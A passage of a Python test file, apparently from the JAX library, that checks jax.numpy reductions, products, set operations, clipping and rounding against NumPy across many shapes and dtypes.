  @jtu.ignore_warning(category=RuntimeWarning,
                      message="invalid value encountered in true_divide*")
  def np_fun(x):
    x_cast = x if not is_bf16_nan_test else x.astype(np.float32)
    res = np_op(x_cast, axis, keepdims=keepdims, where=where)
    res = res if not is_bf16_nan_test else res.astype(jnp.bfloat16)
    return res
  np_fun = _promote_like_jnp(np_fun, inexact)
  np_fun = jtu.ignore_warning(category=np.ComplexWarning)(np_fun)
  jnp_fun = lambda x: jnp_op(x, axis, keepdims=keepdims, where=where)
  jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
  args_maker = lambda: [rng(shape, dtype)]
  # Only compare against NumPy >= 1.20.2 (except for all/any) — presumably
  # older NumPy had incorrect where-masked results; confirm before relying.
  if numpy_version >= (1, 20, 2) or np_op.__name__ in ("all", "any"):
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_axis={}".format(
        jtu.format_shape_dtype_string(shape, dtype), axis),
     "shape": shape, "dtype": dtype, "axis": axis}
    for shape in all_shapes for dtype in all_dtypes
    for axis in list(range(-len(shape), len(shape))) + [None]))
def testCountNonzero(self, shape, dtype, axis):
  """jnp.count_nonzero should agree with np.count_nonzero on every axis."""
  rng = jtu.rand_some_zero(self.rng())

  def np_fun(x):
    return np.count_nonzero(x, axis)

  def jnp_fun(x):
    return jnp.count_nonzero(x, axis)

  def args_maker():
    return [rng(shape, dtype)]

  # Result dtypes differ between NumPy and jnp; compare values only.
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}".format(
        jtu.format_shape_dtype_string(shape, dtype)),
     "shape": shape, "dtype": dtype}
    for shape in all_shapes for dtype in all_dtypes))
def testNonzero(self, shape, dtype):
  """jnp.nonzero should match np.nonzero (index values; dtypes may differ)."""
  rng = jtu.rand_some_zero(self.rng())

  # NumPy warns when nonzero is applied to 0d arrays; silence that here.
  @jtu.ignore_warning(category=DeprecationWarning,
                      message="Calling nonzero on 0d arrays.*")
  def np_fun(x):
    return np.nonzero(x)

  def args_maker():
    return [rng(shape, dtype)]

  self._CheckAgainstNumpy(np_fun, jnp.nonzero, args_maker, check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_size={}_fill_value={}".format(
        jtu.format_shape_dtype_string(shape, dtype), size, fill_value),
     "shape": shape, "dtype": dtype, "size": size, "fill_value": fill_value}
    for shape in nonempty_array_shapes
    for dtype in all_dtypes
    for fill_value in [None, -1]
    for size in [1, 5, 10]))
def testNonzeroSize(self, shape, dtype, size, fill_value):
  """Check jnp.nonzero's static `size`/`fill_value` against emulated NumPy."""
  rng = jtu.rand_some_zero(self.rng())
  args_maker = lambda: [rng(shape, dtype)]
  @jtu.ignore_warning(category=DeprecationWarning, message="Calling nonzero on 0d arrays.*")
  def np_fun(x):
    # Emulate jnp's fixed-size semantics: truncate to `size`, or pad with
    # fill_value (falling back to 0 when fill_value is None).
    result = np.nonzero(x)
    if size <= len(result[0]):
      return tuple(arg[:size] for arg in result)
    else:
      return tuple(np.concatenate([arg, np.full(size - len(arg), fill_value or 0, arg.dtype)])
                   for arg in result)
  jnp_fun = lambda x: jnp.nonzero(x, size=size, fill_value=fill_value)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}".format(
        jtu.format_shape_dtype_string(shape, dtype)),
     "shape": shape, "dtype": dtype}
    for shape in all_shapes for dtype in all_dtypes))
def testFlatNonzero(self, shape, dtype):
  """Check jnp.flatnonzero against np.flatnonzero."""
  rng = jtu.rand_some_zero(self.rng())
  # NumPy warns when nonzero is applied to 0d arrays; silence that here.
  np_fun = jtu.ignore_warning(
      category=DeprecationWarning,
      message="Calling nonzero on 0d arrays.*")(np.flatnonzero)
  jnp_fun = jnp.flatnonzero
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)

  # JIT compilation requires specifying the size statically:
  jnp_fun = lambda x: jnp.flatnonzero(x, size=np.size(x) // 2)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}".format(
        jtu.format_shape_dtype_string(shape, dtype)),
     "shape": shape, "dtype": dtype}
    for shape in all_shapes for dtype in all_dtypes))
def testArgWhere(self, shape, dtype):
  """Check jnp.argwhere against np.argwhere."""
  rng = jtu.rand_some_zero(self.rng())
  # NumPy warns when nonzero is applied to 0d arrays; silence that here.
  np_fun = jtu.ignore_warning(
      category=DeprecationWarning,
      message="Calling nonzero on 0d arrays.*")(np.argwhere)
  jnp_fun = jnp.argwhere
  args_maker = lambda: [rng(shape, dtype)]
  if shape in (scalar_shapes + [()]) and numpy_version < (1, 18):
    self.skipTest("np.argwhere() result for scalar input changed in numpy 1.18.")
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)

  # JIT compilation requires specifying a size statically. Full test of this
  # behavior is in testNonzeroSize().
  jnp_fun = lambda x: jnp.argwhere(x, size=np.size(x) // 2)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "{}_inshape={}_axis={}".format(
        rec.test_name.capitalize(),
        jtu.format_shape_dtype_string(shape, dtype), axis),
     "rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
     "np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
     "axis": axis}
    for rec in JAX_ARGMINMAX_RECORDS
    for shape, dtype in _shape_and_dtypes(rec.shapes, rec.dtypes)
    for axis in range(-len(shape), len(shape))))
def testArgMinMax(self, np_op, jnp_op, rng_factory, shape, dtype, axis):
  """Check argmin/argmax (and nan variants) against NumPy along each axis."""
  rng = rng_factory(self.rng())
  if dtype == np.complex128 and jtu.device_under_test() == "gpu":
    raise unittest.SkipTest("complex128 reductions not supported on GPU")
  if "nan" in np_op.__name__ and dtype == jnp.bfloat16:
    raise unittest.SkipTest("NumPy doesn't correctly handle bfloat16 arrays")
  def np_fun(array_to_reduce):
    # Cast indices to jnp's default integer dtype so result dtypes agree.
    return np_op(array_to_reduce, axis).astype(jnp.int_)
  def jnp_fun(array_to_reduce):
    return jnp_op(array_to_reduce, axis)
  args_maker = lambda: [rng(shape, dtype)]
  try:
    self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  except ValueError as e:
    # NumPy's nanargmin/nanargmax raise on all-NaN slices; JAX does not.
    if str(e) == "All-NaN slice encountered":
      self.skipTest("JAX doesn't support checking for all-NaN slices")
    else:
      raise
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": rec.test_name.capitalize(), "name": rec.name,
     "np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name)}
    for rec in JAX_ARGMINMAX_RECORDS))
def testArgMinMaxEmpty(self, name, np_op, jnp_op):
  """argmin/argmax must raise on empty reductions and match NumPy otherwise."""
  # The nan variants report the same message as their plain counterparts.
  if name.startswith("nan"):
    name = name[3:]
  msg = "attempt to get {} of an empty sequence".format(name)

  # Reducing an empty 1D array, or along an axis of length 0, is an error.
  for trigger in (lambda: jnp_op(np.array([])),
                  lambda: jnp_op(np.zeros((2, 0)), axis=1)):
    with self.assertRaises(ValueError, msg=msg):
      trigger()

  # Reducing over the non-empty axis of a (2, 0) array is legal.
  args_maker = lambda: [np.zeros((2, 0))]
  self._CheckAgainstNumpy(partial(np_op, axis=0), partial(jnp_op, axis=0),
                          args_maker)
  self._CompileAndCheck(partial(jnp_op, axis=0), args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_{}_{}".format(
        jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
        jtu.format_shape_dtype_string(rhs_shape, rhs_dtype),
        axes),
     "lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
     "rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype,
     "axes": axes}
    # axes is (axisa, axisb, axisc, axis); per np.cross, a non-None axis
    # overrides the other three.
    for lhs_shape, rhs_shape, axes in [
        [(2,), (2,), (-1, -1, -1, None)], # scalar output
        [(2, 4), (2, 4), (-1, -1, -1, 0)], # 2D vectors
        [(3, 4), (3, 4), (-1, -1, -1, 0)], # 3D vectors
        [(3, 4), (3, 6, 5, 4), (-1, -1, -1, 0)], # broadcasting
        [(4, 3), (3, 6, 5, 4), (1, 0, -1, None)], # different axes
        [(6, 1, 3), (5, 3), (-1, -1, -1, None)], # more broadcasting
        [(6, 1, 2), (5, 3), (-1, -1, -1, None)], # mixed 2D and 3D vectors
        [(10, 5, 2, 8), (1, 5, 1, 3), (-2, -1, -3, None)], # axes/broadcasting
        [(4, 5, 2), (4, 5, 2), (-1, -1, 0, None)], # axisc should do nothing
        [(4, 5, 2), (4, 5, 2), (-1, -1, -1, None)] # same as before
    ]
    for lhs_dtype, rhs_dtype in itertools.combinations_with_replacement(number_dtypes, 2)))
@jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
def testCross(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype, axes):
  """Check jnp.cross against np.cross over axis choices and broadcasting."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
  axisa, axisb, axisc, axis = axes
  jnp_fun = lambda a, b: jnp.cross(a, b, axisa, axisb, axisc, axis)
  def np_fun(a, b):
    # NumPy lacks bfloat16; compute in float32, cast to the jnp promotion.
    a = a.astype(np.float32) if lhs_dtype == jnp.bfloat16 else a
    b = b.astype(np.float32) if rhs_dtype == jnp.bfloat16 else b
    out = np.cross(a, b, axisa, axisb, axisc, axis)
    return out.astype(jnp.promote_types(lhs_dtype, rhs_dtype))
  # Low-precision float types need much looser tolerances.
  tol_spec = {dtypes.bfloat16: 3e-1, np.float16: 0.15}
  tol = max(jtu.tolerance(lhs_dtype, tol_spec),
            jtu.tolerance(rhs_dtype, tol_spec))
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                          tol=tol)
  self._CompileAndCheck(jnp_fun, args_maker, atol=tol,
                        rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_{}_{}".format(
        name,
        jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
        jtu.format_shape_dtype_string(rhs_shape, rhs_dtype)),
     "lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
     "rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype}
    for name, lhs_shape, rhs_shape in [
        ("matrix-scalar", (3, 3), ()),
        ("scalar-matrix", (), (3, 3)),
        ("matrix-vector", (4, 5), (5,)),
        ("vector-matrix", (6,), (6, 4)),
        ("matrix-matrix", (3, 4), (4, 5)),
        ("tensor-vector", (4, 3, 2), (2,)),
        ("vector-tensor", (2,), (3, 2, 4)),
        ("tensor-matrix", (4, 3, 2), (2, 5)),
        ("matrix-tensor", (5, 2), (3, 2, 4)),
        ("tensor-tensor", (2, 3, 4), (5, 4, 1))]
    for lhs_dtype, rhs_dtype in itertools.combinations_with_replacement(number_dtypes, 2)))
def testDot(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype):
  """Check jnp.dot against np.dot for scalar/vector/matrix/tensor operands."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
  tol = {np.float16: 1e-2, np.float32: 1e-5, np.float64: 1e-14,
         np.complex128: 1e-14}
  # Looser tolerances on TPU.
  if jtu.device_under_test() == "tpu":
    tol[np.float16] = tol[np.float32] = tol[np.complex64] = 2e-1
  def np_dot(x, y):
    # NumPy lacks bfloat16; compute in float32, cast to the jnp promotion.
    x = x.astype(np.float32) if lhs_dtype == jnp.bfloat16 else x
    y = y.astype(np.float32) if rhs_dtype == jnp.bfloat16 else y
    return np.dot(x, y).astype(jnp.promote_types(lhs_dtype, rhs_dtype))
  self._CheckAgainstNumpy(np_dot, jnp.dot, args_maker,
                          tol=tol)
  self._CompileAndCheck(jnp.dot, args_maker, atol=tol,
                        rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_{}_{}".format(
        name,
        jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
        jtu.format_shape_dtype_string(rhs_shape, rhs_dtype)),
     "lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
     "rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype}
    for name, lhs_shape, rhs_shape in [
        ("vector-vector", (3,), (3,)),
        ("matrix-vector", (3, 3), (3,)),
        ("vector-matrix", (3,), (3, 3)),
        ("matrix-matrix", (3, 3), (3, 3)),
        ("vector-tensor", (3,), (5, 3, 2)),
        ("tensor-vector", (5, 3, 2), (2,)),
        ("matrix-tensor", (5, 2), (3, 2, 4)),
        ("tensor-matrix", (5, 2, 3), (3, 2)),
        ("tensor-tensor", (5, 3, 4), (5, 4, 1)),
        ("tensor-tensor-broadcast", (3, 1, 3, 4), (5, 4, 1))]
    for lhs_dtype, rhs_dtype in itertools.combinations_with_replacement(number_dtypes, 2)))
def testMatmul(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype):
  """Check jnp.matmul against np.matmul, including batch broadcasting."""
  rng = jtu.rand_default(self.rng())
  def np_fun(x, y):
    # Cast NumPy's result to the dtype jnp's promotion rules would produce.
    dtype = jnp.promote_types(lhs_dtype, rhs_dtype)
    return np.matmul(x, y).astype(dtype)
  args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
  tol = {np.float16: 1e-2, np.float32: 2e-2, np.float64: 1e-12,
         np.complex128: 1e-12}
  # Looser tolerances on TPU.
  if jtu.device_under_test() == "tpu":
    tol[np.float16] = tol[np.float32] = tol[np.complex64] = 4e-2
  self._CheckAgainstNumpy(np_fun, jnp.matmul, args_maker, tol=tol)
  self._CompileAndCheck(jnp.matmul, args_maker, atol=tol, rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_{}_{}".format(
        jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
        jtu.format_shape_dtype_string(rhs_shape, rhs_dtype),
        axes),
     "lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
     "rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype,
     "axes": axes}
    # axes may be an int (contract the last k axes of lhs against the
    # first k of rhs) or explicit per-operand axis lists — see np.tensordot.
    for lhs_shape, rhs_shape, axes in [
        [(3,), (), 0],
        [(2, 3, 4), (5, 6, 7), 0],  # from issue #740
        [(2, 3, 4), (3, 4, 5, 6), 2],
        [(2, 3, 4), (5, 4, 3, 6), [1, 2]],
        [(2, 3, 4), (5, 4, 3, 6), [[1, 2], [2, 1]]],
        [(1, 2, 3, 4), (4, 5, 3, 6), [[2, 3], [2, 0]]],
    ]
    for lhs_dtype, rhs_dtype in itertools.combinations_with_replacement(number_dtypes, 2)))
def testTensordot(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype, axes):
  """Check jnp.tensordot against np.tensordot for varied axes specs."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
  jnp_fun = lambda a, b: jnp.tensordot(a, b, axes)
  def np_fun(a, b):
    # NumPy lacks bfloat16; compute in float32, cast to the jnp promotion.
    a = a if lhs_dtype != jnp.bfloat16 else a.astype(np.float32)
    b = b if rhs_dtype != jnp.bfloat16 else b.astype(np.float32)
    dtype = jnp.promote_types(lhs_dtype, rhs_dtype)
    return np.tensordot(a, b, axes).astype(dtype)
  tol = {np.float16: 1e-1, np.float32: 1e-3, np.float64: 1e-12,
         np.complex64: 1e-3, np.complex128: 1e-12}
  # Looser tolerances on TPU.
  if jtu.device_under_test() == "tpu":
    tol[np.float16] = tol[np.float32] = tol[np.complex64] = 2e-1
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                          tol=tol)
  self._CompileAndCheck(jnp_fun, args_maker)
def testTensordotErrors(self):
  """Malformed `axes` arguments to jnp.tensordot raise descriptive TypeErrors."""
  lhs = np.random.random((3, 2, 2))
  rhs = np.random.random((2,))
  error_cases = [
      (2, "Number of tensordot axes.*exceeds input ranks.*"),
      (([0], [0, 1]), "tensordot requires axes lists to have equal length.*"),
      (('bad', 'axes'),
       "tensordot requires both axes lists to be either ints, tuples or lists.*"),
      ('badaxes',
       "tensordot axes argument must be an int, a pair of ints, or a pair of lists.*"),
  ]
  for axes, pattern in error_cases:
    with self.assertRaisesRegex(TypeError, pattern):
      jnp.tensordot(lhs, rhs, axes=axes)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_{}_invert={}".format(
        jtu.format_shape_dtype_string(element_shape, dtype),
        jtu.format_shape_dtype_string(test_shape, dtype), invert),
     "element_shape": element_shape, "test_shape": test_shape,
     "dtype": dtype, "invert": invert}
    for element_shape in all_shapes
    for test_shape in all_shapes
    for dtype in default_dtypes
    for invert in [True, False]))
def testIsin(self, element_shape, test_shape, dtype, invert):
  """jnp.isin should agree with np.isin for all shape pairs, both inverts."""
  rng = jtu.rand_default(self.rng())

  def args_maker():
    return [rng(element_shape, dtype), rng(test_shape, dtype)]

  def np_fun(elements, test_elements):
    return np.isin(elements, test_elements, invert=invert)

  def jnp_fun(elements, test_elements):
    return jnp.isin(elements, test_elements, invert=invert)

  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_{}_invert={}".format(
        jtu.format_shape_dtype_string(element_shape, dtype),
        jtu.format_shape_dtype_string(test_shape, dtype), invert),
     "element_shape": element_shape, "test_shape": test_shape,
     "dtype": dtype, "invert": invert}
    for element_shape in all_shapes
    for test_shape in all_shapes
    for dtype in default_dtypes
    for invert in [True, False]))
def testIn1d(self, element_shape, test_shape, dtype, invert):
  """jnp.in1d should agree with np.in1d for all shape pairs, both inverts."""
  rng = jtu.rand_default(self.rng())

  def args_maker():
    return [rng(element_shape, dtype), rng(test_shape, dtype)]

  def np_fun(elements, test_elements):
    return np.in1d(elements, test_elements, invert=invert)

  def jnp_fun(elements, test_elements):
    return jnp.in1d(elements, test_elements, invert=invert)

  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_{}".format(
        jtu.format_shape_dtype_string(shape1, dtype1),
        jtu.format_shape_dtype_string(shape2, dtype2)),
     "shape1": shape1, "shape2": shape2, "dtype1": dtype1, "dtype2": dtype2}
    for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
    for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
    for shape1 in all_shapes
    for shape2 in all_shapes))
def testSetdiff1d(self, shape1, shape2, dtype1, dtype2):
  """jnp.setdiff1d should agree with np.setdiff1d across shape/dtype pairs."""
  rng = jtu.rand_default(self.rng())

  def args_maker():
    return [rng(shape1, dtype1), rng(shape2, dtype2)]

  self._CheckAgainstNumpy(np.setdiff1d, jnp.setdiff1d, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_{}".format(
        jtu.format_shape_dtype_string(shape1, dtype1),
        jtu.format_shape_dtype_string(shape2, dtype2)),
     "shape1": shape1, "shape2": shape2, "dtype1": dtype1, "dtype2": dtype2}
    for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
    for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
    for shape1 in nonempty_nonscalar_array_shapes
    for shape2 in nonempty_nonscalar_array_shapes))
def testUnion1d(self, shape1, shape2, dtype1, dtype2):
  """jnp.union1d should match np.union1d after jnp-style type promotion."""
  rng = jtu.rand_default(self.rng())

  def args_maker():
    return [rng(shape1, dtype1), rng(shape2, dtype2)]

  def np_fun(arg1, arg2):
    # Cast NumPy's result to the dtype jnp's promotion rules would produce.
    promoted = jnp.promote_types(arg1.dtype, arg2.dtype)
    return np.union1d(arg1, arg2).astype(promoted)

  self._CheckAgainstNumpy(np_fun, jnp.union1d, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_{}_size={}".format(
        jtu.format_shape_dtype_string(shape1, dtype1),
        jtu.format_shape_dtype_string(shape2, dtype2), size),
     "shape1": shape1, "shape2": shape2, "dtype1": dtype1, "dtype2": dtype2, "size": size}
    for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
    for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
    for shape1 in nonempty_nonscalar_array_shapes
    for shape2 in nonempty_nonscalar_array_shapes
    for size in [1, 5, 10]))
def testUnion1dSize(self, shape1, shape2, dtype1, dtype2, size):
  """Check jnp.union1d's static `size` argument against emulated NumPy."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(shape1, dtype1), rng(shape2, dtype2)]
  def np_fun(arg1, arg2):
    dtype = jnp.promote_types(arg1.dtype, arg2.dtype)
    result = np.union1d(arg1, arg2).astype(dtype)
    # Emulate jnp's fixed-size semantics: truncate, or pad with the first
    # (smallest) element of the sorted union.
    if size <= len(result):
      return result[:size]
    else:
      return np.concatenate([result, np.full(size - len(result), result[0], result.dtype)])
  def jnp_fun(arg1, arg2):
    return jnp.union1d(arg1, arg2, size=size)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
  self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_{}_assume_unique={}".format(
        jtu.format_shape_dtype_string(shape1, dtype1),
        jtu.format_shape_dtype_string(shape2, dtype2),
        assume_unique),
     "shape1": shape1, "dtype1": dtype1, "shape2": shape2, "dtype2": dtype2,
     "assume_unique": assume_unique}
    for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
    for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
    for shape1 in all_shapes
    for shape2 in all_shapes
    for assume_unique in [False, True]))
def testSetxor1d(self, shape1, dtype1, shape2, dtype2, assume_unique):
  """Check jnp.setxor1d against np.setxor1d, with and without assume_unique."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(shape1, dtype1), rng(shape2, dtype2)]
  jnp_fun = lambda ar1, ar2: jnp.setxor1d(ar1, ar2, assume_unique=assume_unique)
  def np_fun(ar1, ar2):
    if assume_unique:
      # pre-flatten the arrays to match with jax implementation
      ar1 = np.ravel(ar1)
      ar2 = np.ravel(ar2)
    return np.setxor1d(ar1, ar2, assume_unique)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_{}_assume_unique={}_return_indices={}".format(
        jtu.format_shape_dtype_string(shape1, dtype1),
        jtu.format_shape_dtype_string(shape2, dtype2),
        assume_unique,
        return_indices),
     "shape1": shape1, "dtype1": dtype1, "shape2": shape2, "dtype2": dtype2,
     "assume_unique": assume_unique, "return_indices": return_indices}
    for dtype1 in [s for s in default_dtypes if s != jnp.bfloat16]
    for dtype2 in [s for s in default_dtypes if s != jnp.bfloat16]
    for shape1 in all_shapes
    for shape2 in all_shapes
    for assume_unique in [False, True]
    for return_indices in [False, True]))
def testIntersect1d(self, shape1, dtype1, shape2, dtype2, assume_unique, return_indices):
  """Check jnp.intersect1d against np.intersect1d for all flag combinations."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(shape1, dtype1), rng(shape2, dtype2)]
  jnp_fun = lambda ar1, ar2: jnp.intersect1d(ar1, ar2, assume_unique=assume_unique, return_indices=return_indices)
  np_fun = lambda ar1, ar2: np.intersect1d(ar1, ar2, assume_unique=assume_unique, return_indices=return_indices)
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_{}".format(
        jtu.format_shape_dtype_string(lhs_shape, lhs_dtype),
        jtu.format_shape_dtype_string(rhs_shape, rhs_dtype)),
     "lhs_shape": lhs_shape, "lhs_dtype": lhs_dtype,
     "rhs_shape": rhs_shape, "rhs_dtype": rhs_dtype}
    # TODO(phawkins): support integer dtypes too.
    for lhs_shape, lhs_dtype in _shape_and_dtypes(all_shapes, inexact_dtypes)
    for rhs_shape, rhs_dtype in _shape_and_dtypes(all_shapes, inexact_dtypes)
    # Only shape pairs valid for np.inner: a scalar operand, or matching
    # trailing dimensions.
    if len(jtu._dims_of_shape(lhs_shape)) == 0
    or len(jtu._dims_of_shape(rhs_shape)) == 0
    or lhs_shape[-1] == rhs_shape[-1]))
def testInner(self, lhs_shape, lhs_dtype, rhs_shape, rhs_dtype):
  """Check jnp.inner against np.inner for inexact dtypes."""
  rng = jtu.rand_default(self.rng())
  args_maker = lambda: [rng(lhs_shape, lhs_dtype), rng(rhs_shape, rhs_dtype)]
  def np_fun(lhs, rhs):
    # NumPy lacks bfloat16; compute in float32, cast to the jnp promotion.
    lhs = lhs if lhs_dtype != jnp.bfloat16 else lhs.astype(np.float32)
    rhs = rhs if rhs_dtype != jnp.bfloat16 else rhs.astype(np.float32)
    dtype = jnp.promote_types(lhs_dtype, rhs_dtype)
    return np.inner(lhs, rhs).astype(dtype)
  jnp_fun = lambda lhs, rhs: jnp.inner(lhs, rhs)
  tol_spec = {np.float16: 1e-2, np.float32: 1e-5, np.float64: 1e-13,
              np.complex64: 1e-5}
  # Looser tolerances on TPU.
  if jtu.device_under_test() == "tpu":
    tol_spec[np.float32] = tol_spec[np.complex64] = 2e-1
  tol = max(jtu.tolerance(lhs_dtype, tol_spec),
            jtu.tolerance(rhs_dtype, tol_spec))
  # TODO(phawkins): there are float32/float64 disagreements for some inputs.
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False,
                          tol=tol)
  self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=False, atol=tol,
                        rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_amin={}_amax={}".format(
        jtu.format_shape_dtype_string(shape, dtype), a_min, a_max),
     "shape": shape, "dtype": dtype, "a_min": a_min, "a_max": a_max}
    for shape in all_shapes for dtype in number_dtypes
    for a_min, a_max in [(-1, None), (None, 1), (-0.9, 1),
                         (-np.ones(1), None),
                         (None, np.ones(1)),
                         (np.full(1, -0.9), np.ones(1))]))
@jax.numpy_rank_promotion('allow')  # This test explicitly exercises implicit rank promotion.
def testClipStaticBounds(self, shape, dtype, a_min, a_max):
  """Check jnp.clip against np.clip with static scalar and array bounds."""
  rng = jtu.rand_default(self.rng())
  np_fun = lambda x: np.clip(x, a_min=a_min, a_max=a_max)
  jnp_fun = lambda x: jnp.clip(x, a_min=a_min, a_max=a_max)
  args_maker = lambda: [rng(shape, dtype)]
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
  self._CompileAndCheck(jnp_fun, args_maker)
def testClipError(self):
  """jnp.clip with neither bound supplied must raise a ValueError."""
  pattern = "At most one of a_min and a_max.*"
  with self.assertRaisesRegex(ValueError, pattern):
    jnp.clip(jnp.zeros((3,)))
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_{}_decimals={}".format(
        jtu.format_shape_dtype_string(shape, dtype), decimals),
     "shape": shape, "dtype": dtype, "decimals": decimals}
    for shape, dtype in _shape_and_dtypes(all_shapes, number_dtypes)
    for decimals in [0, 1, -2]))
def testRoundStaticDecimals(self, shape, dtype, decimals):
  """Check jnp.round against np.round for a static decimals argument."""
  rng = jtu.rand_default(self.rng())
  if jnp.issubdtype(dtype, np.integer) and decimals < 0:
    self.skipTest("Integer rounding with decimals < 0 not implemented")
  np_fun = lambda x: np.round(x, decimals=decimals)
  jnp_fun = lambda x: jnp.round(x, decimals=decimals)
  args_maker = lambda: [rng(shape, dtype)]
  tol = {jnp.bfloat16: 5e-2, np.float16: 1e-2}
  # The dtype check is skipped for Python scalar inputs.
  check_dtypes = shape is not jtu.PYTHON_SCALAR_SHAPE
  self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
                          check_dtypes=check_dtypes, tol=tol)
  self._CompileAndCheck(jnp_fun, args_maker, check_dtypes=check_dtypes,
                        atol=tol, rtol=tol)
def testOperatorRound(self):
  """builtins.round must agree between NumPy scalars and JAX values."""
  # Exercise both a jnp scalar and a jnp array holding the same value.
  for jax_val in (jnp.float32(7.5), jnp.array(7.5, jnp.float32)):
    self.assertAllClose(round(np.float32(7.532), 1), round(jax_val, 1))
  for jax_val in (jnp.float32(1.234), jnp.array(1.234, jnp.float32)):
    self.assertAllClose(round(np.float32(1.234), 2), round(jax_val, 2))
    # Without ndigits, round() yields a Python int, so dtypes differ.
    self.assertAllClose(round(np.float32(1.234)), round(jax_val),
                        check_dtypes=False)
@parameterized.named_parameters(jtu.cases_from_list(
    {"testcase_name": "_shape={}_mode={}_padwidth={}_constantvalues={}".format(
        jtu.format_shape_dtype_string(shape, dtype), mode, pad_width,
        constant_values),
     "shape": shape, "dtype": dtype, "mode": mode,
     "pad_width": pad_width, "constant_values": constant_values}
    for mode, shapes in [
        ('constant', all_shapes),
        ('wrap', nonempty_shapes),
